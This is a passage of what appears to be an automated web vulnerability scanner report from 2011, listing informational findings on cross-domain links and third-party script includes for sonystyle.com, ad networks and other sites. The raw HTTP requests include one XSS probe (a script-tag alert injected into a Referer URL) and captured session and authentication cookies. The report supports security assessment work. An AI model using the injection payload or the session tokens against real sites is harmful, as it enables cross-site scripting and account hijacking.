<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast & Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.74. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/LogonForm

Issue detail

The page was loaded from a URL containing a query string:

https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm?storeId=10151&langId=-1&catalogId=10551&URL=SYAccountProfileView

The response contains the following links to other domains:

https://forum.sel.sony.com/
https://nexus2.ensighten.com/sony/Bootstrap.js
https://productregistration.sel.sony.com/app/home.htm
https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp
https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

Request

GET /webapp/wcs/stores/servlet/LogonForm?storeId=10151&langId=-1&catalogId=10551&URL=SYAccountProfileView HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=409204880
Cookie: TS5bbf46=f5a3eb9e27e2bffb98b2405b1503cf8878ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1ea147da6fb05aed8; mbox=check#true#1305494554|session#1305494389047-605069#1305496354|PC#1305494389047-605069.17#1306704094; s_cc=true; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253DSony%252520Store%2526pidt%253D1%2526oid%253Dhttps%25253A//www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D1055%2526ot%253DA; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":5,"c":"https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":5,"s":true,"e":2}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=tibXcp5Dlk4Jh%2fA0Lwms1Uargj4%3d%0a%3b2011%2d05%2d15+17%3a21%3a17%2e83%5f1305494403722%2d66941%5f10151%5f239700478%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; WC_USERACTIVITY_239700478=239700478%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fu1ZnIDD%2bD9cyUsUuZ5p6eV3VX9sG%2bxOfyS%2fVahUux21ujZk%2fh12gxePDRShlaYz5Kb%0arseHaKhahut2Hi0TlmPEHwulUbbCf3yqB5j8879HQFm5kyylh3cBPYT%2fYDZLv6Pzx7s%2b8JmOJA%3d%3d; WC_AUTHENTICATION_239700478=239700478%2cPqxvbxzhgcoXK6H6uawMpABBdk0%3d

Response

HTTP/1.1 200 OK
ntCoent-Length: 87984
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 87984
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:24:04 GMT
Connection: keep-alive
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.75. https://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SYOrderCheckout

Issue detail

The page was loaded from a URL containing a query string:

https://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout?langId=-1&storeId=10151&catalogId=10551&krypto=%2BIw6iFkoFJ1hQSYq1rIctg%3D%3D&ddkey=http:SYOrderCheckout

The response contains the following link to another domain:

https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

Request

Response

HTTP/1.1 200 OK
ntCoent-Length: 4641
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4641
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:22:00 GMT
Connection: keep-alive
Set-Cookie: WC_AUTHENTICATION_239700478=239700478%2cARTMLPmZA%2bNj0aVeOmxZC%2bX1cak%3d; Path=/; Secure
Set-Cookie: TS5bbf46=59f0262ca3943c7bd6ffb222b0c38a9178ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1ea147da6d07ba995; Path=/
Cache-Control: private
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="meta_refresh" ht
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.76. https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The page was loaded from a URL containing a query string:

https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=409204880

The response contains the following links to other domains:

https://forum.sel.sony.com/
https://nexus2.ensighten.com/sony/Bootstrap.js
https://productregistration.sel.sony.com/app/home.htm
https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp
https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

Request

GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=409204880 HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout?langId=-1&storeId=10151&catalogId=10551&krypto=%2BIw6iFkoFJ1hQSYq1rIctg%3D%3D&ddkey=http:SYOrderCheckout
Cookie: TS5bbf46=b8fba18f1f5a5e109b65064644b856f578ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1; mbox=check#true#1305494554|session#1305494389047-605069#1305496354|PC#1305494389047-605069.17#1306704094; s_cc=true; s_visit=1; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":4,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay","lc":{"d0":{"v":4,"s":true,"e":2}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=tibXcp5Dlk4Jh%2fA0Lwms1Uargj4%3d%0a%3b2011%2d05%2d15+17%3a21%3a17%2e83%5f1305494403722%2d66941%5f10151%5f239700478%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; WC_USERACTIVITY_239700478=239700478%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fu1ZnIDD%2bD9cyUsUuZ5p6eV3VX9sG%2bxOfyS%2fVahUux21ujZk%2fh12gxePDRShlaYz5Kb%0arseHaKhahut2Hi0TlmPEHwulUbbCf3yqB5j8879HQFm5kyylh3cBPYT%2fYDZLv6Pzx7s%2b8JmOJA%3d%3d

Response

HTTP/1.1 200 OK
Cteonnt-Length: 91796
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 91796
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:22:06 GMT
Connection: keep-alive
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

23. Cross-domain script include previous next
There are 41 instances of this issue:

http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28
http://ad.doubleclick.net/adi/ta.cc.com.s/disney
http://ad.turn.com/server/ads.js
http://blog.us.playstation.com/
http://blog.us.playstation.com/2011/04/26/update-on-playstation-network-and-qriocity/
http://cdn5.tribalfusion.com/media/1956006/frame.html
http://cplads.appspot.com/ad_tag/three_pas/everst3tags4222011appliedmanagementcontentonlinecollegesappliedmanagement300x250
http://disneycruise.disney.go.com/reservations/customize
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://i.usatoday.net/_common/_scripts/_oas/google.js
http://pastebin.com/trends
http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=71920917/hr=20/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Ftravel.usatoday.com%252Fcruises%252Fpost%252F2011%252F05%252Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%252F169725%252F1
http://secureshopping.mcafee.com/
http://sony.links.channelintelligence.com/pages/prices.asp
http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
http://www.cruisecritic.com/reviews/cruiseline.cfm
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
http://www.fingerhut.com/
https://www.fingerhut.com/user/login.jsp
http://www.guitarcenter.com/Includes/GuitarCenter/Scripts/minified/JS_Header.js
http://www.magicalkingdoms.com/blog/category/disneyland-paris/
http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp
https://www.mcafeesecure.com/RatingVerify
https://www.mcafeesecure.com/favicon.ico
http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html
http://www.siteadvisor.com/download/windows.html
http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay
http://www.sonystyle.com/webapp/wcs/stores/servlet/SYCTOProcess
http://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderItemAddProxy
http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm
https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay
http://www.telegraph.co.uk/sponsored/travel/8509794/Win-a-fantastic-holiday-to-Walt-Disney-World-Florida-and-a-Disney-Cruise-in-the-Bahamas.html
http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
http://www.viddler.com/file/7d63c65a/html5mobile/

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

23.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3941.InviteMedia/B5396963.28

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

23.2. http://ad.doubleclick.net/adi/ta.cc.com.s/disney previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/ta.cc.com.s/disney

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

23.3. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N5823.DbclkAdEx/B5478635.45;abr=!ie;sz=728x90;ord=7992084605561387239;AD_ID=26005388;BEHAVIOR_SIGNAL_ID=319697420;CHANNEL_ID=11185948;LINE_ITEM_ID=184588126;PUBLISHER_ID=11185880;SITE_ID=13906109?;click=http://r.turn.com/r/tpclick/id/57ha2ZqW6W6WvwMAawABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBrsFWtn7QTcaOFpLWsAe-wuzACo200M4B9bmdvRTJkYikFwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTQyNTMwMzg1NDg1MDkwsgEZc2VjdXJlc2hvcHBpbmcubWNhZmVlLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly9zZWN1cmVzaG9wcGluZy5tY2FmZWUuY29tL5gC1LsBwAIEyAK1nNURqAMB6ANO6AO7AugDmALoAxL1AwYAAASABqXS-q_P08q2hQE%26num%3D1%26sig%3DAGiWqtycjJBgtabbvXcUHzHk2Ua0lvcnqA%26client%3Dca-pub-9942530385485090%26adurl%3D/url/;

Request

Response

23.4. http://blog.us.playstation.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.us.playstation.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js?ver=1.3.2

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 15 May 2011 20:26:34 GMT
Content-Type: text/html; charset=UTF-8
Cneonction: close
Vary: Cookie
Last-Modified: Sun, 15 May 2011 20:21:54 +0000
Cache-Control: max-age=20, must-revalidate
X-Pingback: http://blog.us.playstation.com/xmlrpc.php
X-hax0r: sean at voce connect
Content-Length: 71106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel='stylesheet' id='wp-postratings-css' href='http://blog.us.playstation.com/wp-content/plugins/wp-postratings/postratings-css.css?ver=1.50' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js?ver=1.3.2'></script>
...[SNIP]...

23.5. http://blog.us.playstation.com/2011/04/26/update-on-playstation-network-and-qriocity/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.us.playstation.com
Path:	/2011/04/26/update-on-playstation-network-and-qriocity/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js?ver=1.3.2

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 15 May 2011 20:29:54 GMT
Content-Type: text/html; charset=UTF-8
Cneonction: close
Vary: Cookie
Last-Modified: Sun, 15 May 2011 20:27:46 +0000
Cache-Control: max-age=172, must-revalidate
X-Pingback: http://blog.us.playstation.com/xmlrpc.php
Link: <http://blog.us.playstation.com/?p=50646>; rel=shortlink
X-hax0r: sean at voce connect
Content-Length: 82583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel='stylesheet' id='wp-postratings-css' href='http://blog.us.playstation.com/wp-content/plugins/wp-postratings/postratings-css.css?ver=1.50' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js?ver=1.3.2'></script>
...[SNIP]...

23.6. http://cdn5.tribalfusion.com/media/1956006/frame.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn5.tribalfusion.com
Path:	/media/1956006/frame.html

Issue detail

The response dynamically includes the following script from another domain:

http://adadvisor.net/adscores/g.js?sid=9239766368

Request

GET /media/1956006/frame.html HTTP/1.1
Host: cdn5.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/favicon.ico50732%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed0c46a64a0
Cookie: ANON_ID=aqnu7qmMZaEvpXqwmyHTCZcQTyZaEo0vQZbC1fTDYgVTDUhD9uS0rvUGl4MMXK2Zc2VEuiqSTvE8vBkIi3WbxYZdgeBlZcTrfyf8ZdW8jRqY9hb6

Response

HTTP/1.1 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 301
Content-Length: 98
Last-Modified: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html
Date: Sun, 15 May 2011 21:31:35 GMT
Connection: close
Vary: Accept-Encoding
Expires: Tue, 31 Dec 2030 00:00:00 GMT
Expires: Tue, 31 Dec 2030 00:00:00 GMT
Cache-Control: public

<script type="text/javascript" src="http://adadvisor.net/adscores/g.js?sid=9239766368"></script>

23.7. http://cplads.appspot.com/ad_tag/three_pas/everst3tags4222011appliedmanagementcontentonlinecollegesappliedmanagement300x250 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cplads.appspot.com
Path:	/ad_tag/three_pas/everst3tags4222011appliedmanagementcontentonlinecollegesappliedmanagement300x250

Issue detail

The response dynamically includes the following script from another domain:

http://www.inadcoads.com/script.ashx?pczid=c9a0e679-622f-4d8f-9f1d-aa7935b162b1

Request

Response

23.8. http://disneycruise.disney.go.com/reservations/customize previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://disneycruise.disney.go.com
Path:	/reservations/customize

Issue detail

The response dynamically includes the following scripts from other domains:

http://dcl.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/js/_lib/header/default.js
http://dcl.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/js/nonGlobal/searchResults/searchResults.js
http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/js?files=/dewey/2.5.1/build/yui/selector/selector-beta-min.js,/dewey/2.5.1/build/yui/datasource/datasource-min.js,/dewey/2.5.1/build/yui/container/container-min.js,/dewey/2.5.1/build/yui/menu/menu-min.js,/dewey/2.5.1/build/yui/autocomplete/autocomplete-min.js,/dewey/2.5.1/build/yui/json/json-min.js,/dewey/2.5.1/build/yui/logger/logger-min.js,/dewey/2.5.1/build/yui/tabview/tabview-min.js,/dewey/2.5.1/build/yui/history/history-min.js,/dewey/2.5.1/build/yui/slider/slider-min.js,/global/stringUtils.js,/global/validators.js,/global/formUtils.js,/global/codeRegistry.js,/global/tools.js,/_lib/buttons/buttons.js,/_lib/analytics/analytics.js,/global/effects/effects.js,/global/async/errors.js,/global/async/pollingConnection.js,/global/async/ajaxRequest.js,/global/async/pleaseWait.js,/global/forms/abandonForms.js,/global/forms/formValidator.js,/global/forms/fieldValidations.js,/global/partyMixHandler.js,/global/animation/animation.js,/global/animation/sequencer.js,/global/categoryChangeHandler.js,/global/swfobject.js,/_lib/analytics/omniture/s_code.js,/_lib/tools/testAndTarget/mbox.js
http://dcl2.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/js/dewey/2.5.1/build/wdpro/wdproloader-utilities/wdproloader-utilities.js
http://dcl2.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/js/global/flashUtils.js
http://dcl2.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/js/global/search/autoComplete.js
http://dcl2.wdpromedia.com/reservations/concat/2.39.0.9/js?files=/global/loaderInit.js

Request

Response

23.9. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The response dynamically includes the following script from another domain:

https://r.turn.com/server/beacon_call.js?b2=Kou7vow8dSu_fbURFSDie-ClW-Pomi2l-rpnNY62nGC99MpZVZLdyuvF6uqEWXfaAHo6q77axbzTgPr30TdjGA

Request

Response

23.10. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The response dynamically includes the following scripts from other domains:

http://action.media6degrees.com/orbserv/hbjs?pixId=5204&pcv=30
http://www.googleadservices.com/pagead/conversion.js

Request

Response

23.11. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The response dynamically includes the following script from another domain:

https://www.googleadservices.com/pagead/conversion.js

Request

Response

23.12. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
